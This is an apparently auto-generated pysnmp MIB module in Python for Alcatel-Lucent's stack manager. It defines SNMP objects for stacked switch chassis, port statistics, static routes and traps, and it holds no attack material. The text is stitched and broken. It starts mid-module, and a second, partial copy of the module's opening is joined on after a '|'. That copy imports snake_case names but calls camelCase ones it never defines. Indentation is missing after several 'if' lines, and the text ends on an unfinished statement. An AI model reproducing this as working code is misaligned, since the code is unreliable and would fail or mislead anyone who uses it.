if mibBuilder.loadTexts: alaStackMgrRemoteLinkB.setDescription('This is the remote link of the remote NI slot seen through the stacking link B. The values for these ports are platform dependent. The possible values are: - 0: not present - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52.')
alaStackMgrChasState = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 10), AlaStackMgrSlotState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrChasState.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrChasState.setDescription('This current state of the chassis: running (1), duplicateSlot (2), clearedSlot (3), outOfSlots (4), outOfTokens (5), or badMix (6).')
alaStackMgrSavedSlotNINumber = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 11), AlaStackMgrNINumber()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alaStackMgrSavedSlotNINumber.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrSavedSlotNINumber.setDescription('Slot number stored in persistent memory that will be in effect if the stack element reboots. Only slot numbers in the range 1..8 are allowed.')
alaStackMgrCommandAction = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 12), AlaStackMgrCommandAction()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alaStackMgrCommandAction.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrCommandAction.setDescription('This object identifies which of the following Actions is to be performed: clearSlot(1), clearSlotImmediately (2) or reload (3). Whenever a new command is received, the value of the object alaStackMgrCommandStatus will be updated accordingly.')
alaStackMgrCommandStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 13), AlaStackMgrCommandStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrCommandStatus.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrCommandStatus.setDescription('This object provides the current status of last command received from the management as follows: notSignificant(0), clearSlotInProgress(1), clearSlotFailed(2), clearSlotSuccess(3), setSlotInProgress(4), setSlotFailed(5) or setSlotSuccess(6). New commands are only accepted if the value of this object is different than setSlotInProgress and clearSlotInProgress.')
alaStackMgrOperStackingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 14), AlaStackMgrStackingMode()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrOperStackingMode.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrOperStackingMode.setDescription('This object specifies the current running mode of the switch.')
alaStackMgrAdminStackingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 15), AlaStackMgrStackingMode()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alaStackMgrAdminStackingMode.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrAdminStackingMode.setDescription('This object specifies the stack mode atained on reload.')
alaStackMgrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2), )
if mibBuilder.loadTexts: alaStackMgrStatsTable.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatsTable.setDescription('Stack port statistics table.')
alaStackMgrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1), ).setIndexNames((0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"), (0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrStatLinkNumber"))
if mibBuilder.loadTexts: alaStackMgrStatsEntry.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatsEntry.setDescription(' Stats table for stackable ports.')
alaStackMgrStatLinkNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 1), AlaStackMgrLinkNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStatLinkNumber.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatLinkNumber.setDescription(' Local link refers to the stacking port on each slot. The values of these ports are: - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52.')
alaStackMgrStatPktsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStatPktsRx.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatPktsRx.setDescription('The total number of packets recieved on this port.')
alaStackMgrStatPktsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStatPktsTx.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatPktsTx.setDescription('The total number of packets transmitted on this port.')
alaStackMgrStatErrorsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStatErrorsRx.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatErrorsRx.setDescription('The total number of packets in error - received on the port.')
alaStackMgrStatErrorsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStatErrorsTx.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatErrorsTx.setDescription('The total number of packets in error - transmitted on the port.')
alaStackMgrStatDelayFromLastMsg = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStatDelayFromLastMsg.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStatDelayFromLastMsg.setDescription('The delay since the last message.')
alaStackMgrStackStatus = MibScalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 3), AlaStackMgrStackStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStackStatus.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStackStatus.setDescription('Indicates whether the Stack is or not in Loop.')
alaStackMgrTokensUsed = MibScalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrTokensUsed.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrTokensUsed.setDescription('Indicates the total number of tokens that have been allocated to all the elements in the stack.')
alaStackMgrTokensAvailable = MibScalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrTokensAvailable.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrTokensAvailable.setDescription('Indicates the total number of tokens that are still available and that potentially may be allocated to elements of the stack.')
alaStackMgrStaticRouteTable = MibTable((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6), )
if mibBuilder.loadTexts: alaStackMgrStaticRouteTable.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteTable.setDescription('Maintains a list with information about all the static routes in the stack.')
alaStackMgrStaticRouteEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1), ).setIndexNames((0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrStaticRouteSrcStartIf"), (0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrStaticRouteSrcEndIf"), (0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrStaticRouteDstStartIf"), (0, "ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrStaticRouteDstEndIf"))
if mibBuilder.loadTexts: alaStackMgrStaticRouteEntry.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteEntry.setDescription('Each entry corresponds to a static route and lists its source and destination in the stack.')
alaStackMgrStaticRouteSrcStartIf = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: alaStackMgrStaticRouteSrcStartIf.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteSrcStartIf.setDescription('The physical identification number for start source range of the static route')
alaStackMgrStaticRouteSrcEndIf = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: alaStackMgrStaticRouteSrcEndIf.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteSrcEndIf.setDescription('The physical identification number for end source range of the static route')
alaStackMgrStaticRouteDstStartIf = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 3), InterfaceIndex())
if mibBuilder.loadTexts: alaStackMgrStaticRouteDstStartIf.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteDstStartIf.setDescription('The physical identification number for start destination range of the static route')
alaStackMgrStaticRouteDstEndIf = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 4), InterfaceIndex())
if mibBuilder.loadTexts: alaStackMgrStaticRouteDstEndIf.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteDstEndIf.setDescription('The physical identification number for end destination range of the static route')
alaStackMgrStaticRoutePort = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 5), AlaStackMgrLinkNumber().clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alaStackMgrStaticRoutePort.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRoutePort.setDescription('This is the stack link to the destination NI slot . The values for these ports are platform dependent. The possible values are: - 0: not present - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52. Incase of static routesthe value is either 1(STACKA) or 2(STACKB)')
alaStackMgrStaticRoutePortState = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 6), AlaStackMgrLinkStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alaStackMgrStaticRoutePortState.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRoutePortState.setDescription('1 indicates that the static route stacking link is up . 2 indicates that the stacking link is inactive.')
alaStackMgrStaticRouteStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2))).clone('on')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alaStackMgrStaticRouteStatus.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteStatus.setDescription('Whether this static route is enabled or disabled .')
alaStackMgrStaticRouteRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 8), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alaStackMgrStaticRouteRowStatus.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrStaticRouteRowStatus.setDescription('The status of this table entry. ')
alaStackMgrTrapLinkNumber = MibScalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3, 1), AlaStackMgrLinkNumber()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: alaStackMgrTrapLinkNumber.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrTrapLinkNumber.setDescription('Holds the link number, when the stack is not in loop.')
alaStackMgrPrimary = MibScalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3, 2), AlaStackMgrNINumber()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: alaStackMgrPrimary.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrPrimary.setDescription('Holds the slot number of the stack element that plays the role of Primary.')
alaStackMgrSecondary = MibScalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3, 3), AlaStackMgrNINumber()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: alaStackMgrSecondary.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrSecondary.setDescription('Holds the slot number of the stack element that plays the role of Secondary.')
alaStackMgrDuplicateSlotTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 1)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"))
if mibBuilder.loadTexts: alaStackMgrDuplicateSlotTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrDuplicateSlotTrap.setDescription('The element specified by alaStackMgrSlotNINumber has the same slot number of another element of the stack and it must relinquish its operational status because it has a higher election key (up time, slot, mac). The elements will be put in pass through mode.')
alaStackMgrNeighborChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 2)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrStackStatus"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrTrapLinkNumber"))
if mibBuilder.loadTexts: alaStackMgrNeighborChangeTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrNeighborChangeTrap.setDescription('Indicates whether the stack is in loop or not. In case of no loop, alaStackMgrSlotNINumber and alaStackMgrTrapLinkNumber indicate where the Stack is broken')
alaStackMgrRoleChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 3)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrPrimary"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSecondary"))
if mibBuilder.loadTexts: alaStackMgrRoleChangeTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrRoleChangeTrap.setDescription(' Role Change Trap. Indicates that a new primary or secondary is elected.')
alaStackMgrDuplicateRoleTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 4)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrChasRole"))
if mibBuilder.loadTexts: alaStackMgrDuplicateRoleTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrDuplicateRoleTrap.setDescription('The element identified by alaStackMgrSlotNINumber detected the presence of two elements with the same primary or secondary role as specified by alaStackMgrChasRole on the stack.')
alaStackMgrClearedSlotTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 5)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"))
if mibBuilder.loadTexts: alaStackMgrClearedSlotTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrClearedSlotTrap.setDescription('The element identified by alaStackMgrSlotNINumber will enter the pass through mode because its operational slot was cleared with immediate effect.')
alaStackMgrOutOfSlotsTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 6))
if mibBuilder.loadTexts: alaStackMgrOutOfSlotsTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrOutOfSlotsTrap.setDescription('One element of the stack will enter the pass through mode because there are no slot numbers available to be assigned to this element.')
alaStackMgrOutOfTokensTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 7)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"))
if mibBuilder.loadTexts: alaStackMgrOutOfTokensTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrOutOfTokensTrap.setDescription('The element identified by alaStackMgrSlotNINumber will enter the pass through mode because there are no tokens available to be assigned to this element.')
alaStackMgrOutOfPassThruSlotsTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 8))
if mibBuilder.loadTexts: alaStackMgrOutOfPassThruSlotsTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrOutOfPassThruSlotsTrap.setDescription('There are no pass through slots available to be assigned to an element that is supposed to enter the pass through mode.')
alaStackMgrBadMixTrap = NotificationType((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 9)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"))
if mibBuilder.loadTexts: alaStackMgrBadMixTrap.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrBadMixTrap.setDescription('The element identified by alaStackMgrSlotNINumber will enter the pass through mode because it is not compatible with the existing stack.')
alcatelIND1StackMgrMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 1))
alcatelIND1StackMgrMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 2))
alaStackMgrCfgMgrGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 1, 1)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotNINumber"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSlotCMMNumber"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrChasRole"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrLocalLinkStateA"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrRemoteNISlotA"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrRemoteLinkA"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrLocalLinkStateB"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrRemoteNISlotB"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrRemoteLinkB"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrChasState"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrSavedSlotNINumber"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrCommandAction"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrCommandStatus"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrOperStackingMode"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrAdminStackingMode"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
alaStackMgrCfgMgrGroup = alaStackMgrCfgMgrGroup.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrCfgMgrGroup.setDescription('A collection of objects providing information about the topology of the stack .')
alaStackMgrNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 1, 2)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrDuplicateSlotTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrNeighborChangeTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrRoleChangeTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrDuplicateRoleTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrClearedSlotTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrOutOfSlotsTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrOutOfTokensTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrOutOfPassThruSlotsTrap"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrBadMixTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
alaStackMgrNotificationGroup = alaStackMgrNotificationGroup.setStatus('current')
if mibBuilder.loadTexts: alaStackMgrNotificationGroup.setDescription('A collection of notifications for signaling Stack manager events.')
alcatelIND1StackMgrMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 2, 1)).setObjects(("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrCfgMgrGroup"), ("ALCATEL-IND1-STACK-MANAGER-MIB", "alaStackMgrNotificationGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
alcatelIND1StackMgrMIBCompliance = alcatelIND1StackMgrMIBCompliance.setStatus('current')
if mibBuilder.loadTexts: alcatelIND1StackMgrMIBCompliance.setDescription('The compliance statement for device support of Stack Manager.')
mibBuilder.exportSymbols("ALCATEL-IND1-STACK-MANAGER-MIB", alaStackMgrStatPktsTx=alaStackMgrStatPktsTx, alaStackMgrNeighborChangeTrap=alaStackMgrNeighborChangeTrap, AlaStackMgrNINumber=AlaStackMgrNINumber, alaStackMgrStaticRoutePortState=alaStackMgrStaticRoutePortState, alaStackMgrDuplicateRoleTrap=alaStackMgrDuplicateRoleTrap, alaStackMgrTrapLinkNumber=alaStackMgrTrapLinkNumber, alaStackMgrOutOfSlotsTrap=alaStackMgrOutOfSlotsTrap, alaStackMgrOutOfPassThruSlotsTrap=alaStackMgrOutOfPassThruSlotsTrap, alaStackMgrDuplicateSlotTrap=alaStackMgrDuplicateSlotTrap, alaStackMgrRoleChangeTrap=alaStackMgrRoleChangeTrap, alaStackMgrLocalLinkStateA=alaStackMgrLocalLinkStateA, alaStackMgrCfgMgrGroup=alaStackMgrCfgMgrGroup, alcatelIND1StackMgrMIBObjects=alcatelIND1StackMgrMIBObjects, alaStackMgrStatPktsRx=alaStackMgrStatPktsRx, alaStackMgrStaticRouteRowStatus=alaStackMgrStaticRouteRowStatus, alcatelIND1StackMgrMIBCompliance=alcatelIND1StackMgrMIBCompliance, alaStackMgrSecondary=alaStackMgrSecondary, alaStackMgrAdminStackingMode=alaStackMgrAdminStackingMode, alaStackMgrStatDelayFromLastMsg=alaStackMgrStatDelayFromLastMsg, AlaStackMgrSlotState=AlaStackMgrSlotState, alaStackMgrChassisEntry=alaStackMgrChassisEntry, alaStackMgrStaticRouteDstStartIf=alaStackMgrStaticRouteDstStartIf, PYSNMP_MODULE_ID=alcatelIND1StackMgrMIB, alaStackMgrStaticRouteStatus=alaStackMgrStaticRouteStatus, AlaStackMgrSlotRole=AlaStackMgrSlotRole, alaStackMgrNotificationGroup=alaStackMgrNotificationGroup, alaStackMgrStatErrorsTx=alaStackMgrStatErrorsTx, alaStackMgrStatLinkNumber=alaStackMgrStatLinkNumber, alcatelIND1StackMgrMIB=alcatelIND1StackMgrMIB, alaStackMgrRemoteNISlotB=alaStackMgrRemoteNISlotB, alaStackMgrStackStatus=alaStackMgrStackStatus, alaStackMgrStaticRoutePort=alaStackMgrStaticRoutePort, AlaStackMgrCommandStatus=AlaStackMgrCommandStatus, alaStackMgrStatsEntry=alaStackMgrStatsEntry, AlaStackMgrCommandAction=AlaStackMgrCommandAction, AlaStackMgrLinkStatus=AlaStackMgrLinkStatus, alaStackMgrStaticRouteDstEndIf=alaStackMgrStaticRouteDstEndIf, alaStackMgrRemoteNISlotA=alaStackMgrRemoteNISlotA, alaStackMgrStaticRouteSrcStartIf=alaStackMgrStaticRouteSrcStartIf, alaStackMgrCommandStatus=alaStackMgrCommandStatus, alaStackMgrStatsTable=alaStackMgrStatsTable, alaStackMgrTraps=alaStackMgrTraps, alaStackMgrTokensUsed=alaStackMgrTokensUsed, alaStackMgrTokensAvailable=alaStackMgrTokensAvailable, alaStackMgrPrimary=alaStackMgrPrimary, alaStackMgrCommandAction=alaStackMgrCommandAction, alaStackMgrSlotNINumber=alaStackMgrSlotNINumber, AlaStackMgrLinkNumber=AlaStackMgrLinkNumber, alaStackMgrStaticRouteSrcEndIf=alaStackMgrStaticRouteSrcEndIf, alcatelIND1StackMgrTrapObjects=alcatelIND1StackMgrTrapObjects, alaStackMgrRemoteLinkB=alaStackMgrRemoteLinkB, AlaStackMgrStackingMode=AlaStackMgrStackingMode, alaStackMgrChasRole=alaStackMgrChasRole, alaStackMgrSavedSlotNINumber=alaStackMgrSavedSlotNINumber, alaStackMgrOutOfTokensTrap=alaStackMgrOutOfTokensTrap, alaStackMgrStaticRouteTable=alaStackMgrStaticRouteTable, alaStackMgrOperStackingMode=alaStackMgrOperStackingMode, alaStackMgrStaticRouteEntry=alaStackMgrStaticRouteEntry, alaStackMgrStatErrorsRx=alaStackMgrStatErrorsRx, alaStackMgrBadMixTrap=alaStackMgrBadMixTrap, alcatelIND1StackMgrMIBCompliances=alcatelIND1StackMgrMIBCompliances, AlaStackMgrStackStatus=AlaStackMgrStackStatus, alcatelIND1StackMgrMIBGroups=alcatelIND1StackMgrMIBGroups, alaStackMgrChasState=alaStackMgrChasState, alaStackMgrChassisTable=alaStackMgrChassisTable, alaStackMgrSlotCMMNumber=alaStackMgrSlotCMMNumber, alaStackMgrRemoteLinkA=alaStackMgrRemoteLinkA, alaStackMgrLocalLinkStateB=alaStackMgrLocalLinkStateB, alaStackMgrClearedSlotTrap=alaStackMgrClearedSlotTrap, alcatelIND1StackMgrMIBConformance=alcatelIND1StackMgrMIBConformance)
| (softent_ind1_stack_mgr,) = mibBuilder.importSymbols('ALCATEL-IND1-BASE', 'softentIND1StackMgr')
(integer, object_identifier, octet_string) = mibBuilder.importSymbols('ASN1', 'Integer', 'ObjectIdentifier', 'OctetString')
(named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(single_value_constraint, value_range_constraint, constraints_union, constraints_intersection, value_size_constraint) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'SingleValueConstraint', 'ValueRangeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection', 'ValueSizeConstraint')
(interface_index,) = mibBuilder.importSymbols('IF-MIB', 'InterfaceIndex')
(module_compliance, notification_group, object_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'ModuleCompliance', 'NotificationGroup', 'ObjectGroup')
(mib_scalar, mib_table, mib_table_row, mib_table_column, object_identity, unsigned32, counter32, time_ticks, gauge32, notification_type, mib_identifier, integer32, module_identity, iso, bits, counter64, ip_address) = mibBuilder.importSymbols('SNMPv2-SMI', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'ObjectIdentity', 'Unsigned32', 'Counter32', 'TimeTicks', 'Gauge32', 'NotificationType', 'MibIdentifier', 'Integer32', 'ModuleIdentity', 'iso', 'Bits', 'Counter64', 'IpAddress')
(display_string, row_status, textual_convention) = mibBuilder.importSymbols('SNMPv2-TC', 'DisplayString', 'RowStatus', 'TextualConvention')
alcatel_ind1_stack_mgr_mib = module_identity((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1))
alcatelIND1StackMgrMIB.setRevisions(('2009-02-06 00:00', '2007-04-03 00:00', '2005-07-15 00:00', '2004-07-01 00:00', '2004-04-23 00:00', '2004-04-08 00:00', '2004-04-04 00:00', '2004-03-22 00:00', '2004-03-08 00:00', '2001-08-27 00:00'))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts:
alcatelIND1StackMgrMIB.setRevisionsDescriptions(('Added alaStackMgrOperStackingMode and alaStackMgrAdminStackingMode objects. Added AlaStackMgrStackingMode TEXTUAL-CONVENTION.', 'Updated copyright information.', 'New trap alaStackMgrBadMixTrap has been added. AlaStackMgrSlotState & AlaStackMgrLinkNumber textual convention have been modified.', 'Updates on definitions for link states. Updates on pass through slot range.', 'New trap alaStackMgrOutOfPassThruSlotsTrap has been added.', 'alaStackMgrPassThruTrap has been split in three traps to assure backwards compatibility with previous releases of the Birds Of Prey products.', '-Command action and command status objects added to the chassis table. -Link state textual conventions have been updated.', 'Objects to handle information about token usage.', 'Objects to support the pass through mode added.', 'Addressing discrepancies with Alcatel Standard.'))
if mibBuilder.loadTexts:
alcatelIND1StackMgrMIB.setLastUpdated('200902060000Z')
if mibBuilder.loadTexts:
alcatelIND1StackMgrMIB.setOrganization('Alcatel-Lucent')
if mibBuilder.loadTexts:
alcatelIND1StackMgrMIB.setContactInfo('Please consult with Customer Service to ensure the most appropriate version of this document is used with the products in question: Alcatel-Lucent, Enterprise Solutions Division (Formerly Alcatel Internetworking, Incorporated) 26801 West Agoura Road Agoura Hills, CA 91301-5122 United States Of America Telephone: North America +1 800 995 2696 Latin America +1 877 919 9526 Europe +31 23 556 0100 Asia +65 394 7933 All Other +1 818 878 4507 Electronic Mail: support@ind.alcatel.com World Wide Web: http://alcatel-lucent.com/wps/portal/enterprise File Transfer Protocol: ftp://ftp.ind.alcatel.com/pub/products/mibs')
if mibBuilder.loadTexts:
